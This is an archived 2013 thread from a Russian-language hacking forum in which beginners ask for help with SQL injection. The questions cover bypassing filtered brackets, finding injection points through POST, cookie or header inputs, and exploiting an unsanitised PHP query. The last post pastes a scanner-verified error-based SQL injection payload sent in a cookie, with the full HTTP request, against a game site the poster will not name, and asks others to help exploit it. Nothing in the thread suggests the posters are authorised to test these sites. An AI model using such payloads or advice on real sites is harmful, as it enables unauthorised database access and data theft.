ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

28.02.2013, 13:19
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме: 2459557
Репутация:
606
|
|
Если скобки в URL фильтруются при проведении sql-инъекции, то бессмысленно далее пытаться что-то делать?
|
|
|

28.02.2013, 15:01
|
|
Guest
Сообщений: n/a
Провел на форуме: 290351
Репутация:
173
|
|
Сообщение от попугай
попугай said:
Если скобки в URL фильтруются при проведении sql-инъекции, то бессмысленно далее пытаться что-то делать?
Кодировать запрос? http://urlencode.ru/
|
|
|
|

28.02.2013, 16:25
|
|
Guest
Сообщений: n/a
Провел на форуме: 2021
Репутация:
0
|
|
Подскажите, возможно ли найти уязвимость на сайте с URL вот такого вида http://site.ru/catalog/catalog ... и т.д. где нет например идентификации типа id?=
|
|
|
|

28.02.2013, 16:31
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме: 69033
Репутация:
8
|
|
Сообщение от TeslaNik
TeslaNik said:
Подскажите, возможно ли найти уязвимость на сайте с URL вот такого вида http://site.ru/catalog/catalog ... и т.д. где нет например идентификации типа id?=
POST|COOKIE|HEADER никто не отменял ведь...
Так что думаю, вполне реально.
|
|
|

28.02.2013, 16:35
|
|
Guest
Сообщений: n/a
Провел на форуме: 2021
Репутация:
0
|
|
Сообщение от BigBear
BigBear said:
POST|COOKIE|HEADER никто не отменял ведь...
Так что думаю, вполне реально.
Спасибо буду зубрить=)
|
|
|
|

28.02.2013, 22:23
|
|
Guest
Сообщений: n/a
Провел на форуме: 29647
Репутация:
1
|
|
Возможно сформировать запрос так чтоб скрипт выдал
Код:
Code:
query = "SELECT * FROM `$table_name` WHERE ck_comment_id = $k_id";
?
Скрипт pastebin
|
|
|
|

01.03.2013, 19:07
|
|
Guest
Сообщений: n/a
Провел на форуме: 15180
Репутация:
0
|
|
Прошу помощи:
На сайте есть скрипт usr.php
следующего содержания:
Код:
Code:
get ('usr_'.$id);
if (!$ret)
{
$SQL = sqli::get ();
$x = $SQL->query ("SELECT * FROM `usrs` WHERE `id` = $id");
$ret = $x->fetch_assoc ();
$memcache->set ('usr_'.$id, $ret, 0, 300);
}
return $ret;
}
?>
Насколько я понял, скрипт реализует функцию извлечения инфы из базы данных по идентификатору пользователя, но как ему сообщить этот идентификатор?
Моих познаний хватило только на следующее:
site.com/usr.php?id=1
Хотя и понимаю, что это неверно, подскажите, пожалуйста правильный запрос.
Спасибо
|
|
|
|

01.03.2013, 19:22
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме: 69033
Репутация:
8
|
|
$x = $SQL->query ("SELECT * FROM `usrs` WHERE `id` = $id");
Вот сам запрос...
А вот переменная, которая попадает в запрос...
Она передаётся в функцию напрямую...
function get_Usr ($id)
А уж как и откуда она берётся до функции - куча и куча вариантов...
|
|
|

02.03.2013, 12:35
|
|
Guest
Сообщений: n/a
Провел на форуме: 15180
Репутация:
0
|
|
Сообщение от BigBear
BigBear said:
$x = $SQL->query ("SELECT * FROM `usrs` WHERE `id` =
$id
");
Вот сам запрос...
Спасибо, это я понял,
Сообщение от BigBear
BigBear said:
А вот переменная, которая попадает в запрос...
Она передаётся в функцию напрямую...
function get_Usr ($id)
Это тоже.
Сообщение от BigBear
BigBear said:
А уж как и откуда она берётся до функции - куча и куча вариантов...
А вот тут непонятно: Приведенный код - это весь файл ПХП, лежащий в корне сервера, как я понял, переменная в функцию передается напрямую при запросе пхп-скрипта.
Так вот я и не понял, с каким синтаксисом составить запрос, чтобы переменная из него передалась в функцию.
Я только начинаю, поэтому со скрипом въезжаю в некоторые вопросы.
Спасибо
|
|
|
|

02.03.2013, 13:45
|
|
Guest
Сообщений: n/a
Провел на форуме: 6020
Репутация:
0
|
|
Просканировал сайт программой Acunetix Web Vulnerability Scanner 8
Нашел 24 уязвимости.
Проблема в том, что он дает описание и содержимое этих уязвимостей, НО не дает прямую ссылку на неё.
Показывать сайт не буду из-за религиозных соображений.
Кто реально готов помочь, могу скинуть сохраненный файл от сканированного сайта.
------------
вот одна из них:
Сообщение от None
SQL injection (verified)
This vulnerability affects
/servers
.
Discovered by: Scripting (Sql_Injection.script).
Attack details
Cookie input
pass
was set to
"and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(50),CHAR(7 3),CHAR(55),CHAR(87),CHAR(111),CHAR(67),CHAR(71),C HAR(99)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and"
Injected pattern found:
4Cu2I7WoCGc
------------
Request
GET /servers HTTP/1.1
Cookie: login=demodemo; pass=%22and%28select 1 from%28select count%28%2A%29%2Cconcat%28%28select concat%28CHAR%2852%29%2CCHAR%2867%29%2CCHAR%28117% 29%2CCHAR%2850%29%2CCHAR%2873%29%2CCHAR%2855%29%2C CHAR%2887%29%2CCHAR%28111%29%2CCHAR%2867%29%2CCHAR %2871%29%2CCHAR%2899%29%29 from information_schema.tables limit 0%2C1%29%2Cfloor%28rand%280%29%2A2%29%29x from information_schema.tables group by x%29a%29and%22
Host: game.сайт.ru
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*
--------------

|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|